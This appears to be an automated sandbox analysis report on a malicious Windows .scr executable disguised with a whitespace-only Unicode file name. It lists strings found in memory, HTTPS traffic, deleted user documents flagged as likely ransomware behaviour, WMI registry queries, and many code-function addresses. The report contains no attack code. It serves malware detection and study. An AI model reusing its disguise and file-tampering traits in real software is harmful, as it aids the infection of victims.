Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88278000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340140316.00007FF8A9398000.00000004.00000001.01000000.00000011.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C871D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8D69000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57967
Source: unknown	Network traffic detected: HTTP traffic on port 57967 -> 443

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docx	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docx	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.pdf	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\GIGIYTFFYT.jpg	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.xlsx	Jump to behavior

Source: cmd.exe

Process created: 53

System Summary

Very long command line found

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe

Code function: 68_2_00007FF7F7E9D2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

68_2_00007FF7F7E9D2C0

Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe

Code function: 68_2_00007FF7F7ECB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

68_2_00007FF7F7ECB57C

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE36370	0_2_00007FF73AE36370
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE17950	0_2_00007FF73AE17950
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE372BC	0_2_00007FF73AE372BC
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE30F38	0_2_00007FF73AE30F38
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE27E4C	0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE2EB30	0_2_00007FF73AE2EB30
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE2E4B0	0_2_00007FF73AE2E4B0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE27C98	0_2_00007FF73AE27C98
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE21C90	0_2_00007FF73AE21C90
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE2A430	0_2_00007FF73AE2A430
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE23AE4	0_2_00007FF73AE23AE4
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE222A4	0_2_00007FF73AE222A4
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE30F38	0_2_00007FF73AE30F38
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE34280	0_2_00007FF73AE34280
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE21A84	0_2_00007FF73AE21A84
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE39FF8	0_2_00007FF73AE39FF8
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE18FD0	0_2_00007FF73AE18FD0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE27E4C	0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE11F50	0_2_00007FF73AE11F50
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE25F30	0_2_00007FF73AE25F30
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE3471C	0_2_00007FF73AE3471C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE220A0	0_2_00007FF73AE220A0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE21880	0_2_00007FF73AE21880
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE2E01C	0_2_00007FF73AE2E01C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE365EC	0_2_00007FF73AE365EC
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE36D70	0_2_00007FF73AE36D70
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE22D50	0_2_00007FF73AE22D50
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE236E0	0_2_00007FF73AE236E0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE31EE4	0_2_00007FF73AE31EE4
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE286D0	0_2_00007FF73AE286D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE21E94	0_2_00007FF73AE21E94
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A80918A0	2_2_00007FF8A80918A0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A80912F0	2_2_00007FF8A80912F0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86A7B30	2_2_00007FF8A86A7B30
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86F9AB0	2_2_00007FF8A86F9AB0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8762BB0	2_2_00007FF8A8762BB0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86F9060	2_2_00007FF8A86F9060
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A875B060	2_2_00007FF8A875B060
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87411D0	2_2_00007FF8A87411D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8701630	2_2_00007FF8A8701630
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A872E990	2_2_00007FF8A872E990
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A875099B	2_2_00007FF8A875099B
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86EA940	2_2_00007FF8A86EA940
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8715960	2_2_00007FF8A8715960
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8703980	2_2_00007FF8A8703980
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8745A40	2_2_00007FF8A8745A40
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A871BB91	2_2_00007FF8A871BB91
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8723BA0	2_2_00007FF8A8723BA0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8775B00	2_2_00007FF8A8775B00
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E3BC0	2_2_00007FF8A86E3BC0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8726B40	2_2_00007FF8A8726B40
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86EFC70	2_2_00007FF8A86EFC70
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8708CB0	2_2_00007FF8A8708CB0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E9C80	2_2_00007FF8A86E9C80
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8739D80	2_2_00007FF8A8739D80
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A877FD80	2_2_00007FF8A877FD80
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A872DDA0	2_2_00007FF8A872DDA0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86FCDE0	2_2_00007FF8A86FCDE0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86EBDA0	2_2_00007FF8A86EBDA0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8775EF0	2_2_00007FF8A8775EF0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A874AE70	2_2_00007FF8A874AE70
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86F7F60	2_2_00007FF8A86F7F60
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A873EFB0	2_2_00007FF8A873EFB0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8789FE0	2_2_00007FF8A8789FE0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A870CFE0	2_2_00007FF8A870CFE0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86FBFA0	2_2_00007FF8A86FBFA0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86F1060	2_2_00007FF8A86F1060
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E7030	2_2_00007FF8A86E7030
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87A10E0	2_2_00007FF8A87A10E0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8729010	2_2_00007FF8A8729010
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E40B0	2_2_00007FF8A86E40B0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A874A110	2_2_00007FF8A874A110
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A877A280	2_2_00007FF8A877A280
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87062F0	2_2_00007FF8A87062F0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87072D0	2_2_00007FF8A87072D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E3295	2_2_00007FF8A86E3295
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87433B0	2_2_00007FF8A87433B0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8784330	2_2_00007FF8A8784330
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A873A490	2_2_00007FF8A873A490
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A870E4D0	2_2_00007FF8A870E4D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E74B1	2_2_00007FF8A86E74B1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86F3490	2_2_00007FF8A86F3490
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8752580	2_2_00007FF8A8752580
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8724590	2_2_00007FF8A8724590
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87885B0	2_2_00007FF8A87885B0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87835D0	2_2_00007FF8A87835D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E4510	2_2_00007FF8A86E4510
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A870C530	2_2_00007FF8A870C530
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A873B530	2_2_00007FF8A873B530
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E9640	2_2_00007FF8A86E9640
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87876C0	2_2_00007FF8A87876C0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86F66F0	2_2_00007FF8A86F66F0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8710790	2_2_00007FF8A8710790
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87827A0	2_2_00007FF8A87827A0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A870D7C0	2_2_00007FF8A870D7C0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A872F7D0	2_2_00007FF8A872F7D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E77C4	2_2_00007FF8A86E77C4
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E47C0	2_2_00007FF8A86E47C0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8784750	2_2_00007FF8A8784750
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A87558A0	2_2_00007FF8A87558A0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86E282E	2_2_00007FF8A86E282E
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A878E8E0	2_2_00007FF8A878E8E0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A86FC800	2_2_00007FF8A86FC800
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A878C870	2_2_00007FF8A878C870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF847883027	7_2_00007FF847883027
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E81884	68_2_00007FF7F7E81884
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E8B540	68_2_00007FF7F7E8B540
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E954C0	68_2_00007FF7F7E954C0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E882F0	68_2_00007FF7F7E882F0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E91180	68_2_00007FF7F7E91180
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EAAE10	68_2_00007FF7F7EAAE10
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E8ABA0	68_2_00007FF7F7E8ABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EB7B24	68_2_00007FF7F7EB7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E90A2C	68_2_00007FF7F7E90A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC190C	68_2_00007FF7F7EC190C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EB0904	68_2_00007FF7F7EB0904
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EB38E8	68_2_00007FF7F7EB38E8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ED18A8	68_2_00007FF7F7ED18A8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E92890	68_2_00007FF7F7E92890
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E88884	68_2_00007FF7F7E88884
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EA67E0	68_2_00007FF7F7EA67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E917C8	68_2_00007FF7F7E917C8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EBA710	68_2_00007FF7F7EBA710
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC0710	68_2_00007FF7F7EC0710
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EC2700	68_2_00007FF7F7EC2700
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EE86D4	68_2_00007FF7F7EE86D4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E986C4	68_2_00007FF7F7E986C4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ED7660	68_2_00007FF7F7ED7660
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7ED260C	68_2_00007FF7F7ED260C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EB65FC	68_2_00007FF7F7EB65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EAF5B0	68_2_00007FF7F7EAF5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E98598	68_2_00007FF7F7E98598
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EBF59C	68_2_00007FF7F7EBF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E8A504	68_2_00007FF7F7E8A504
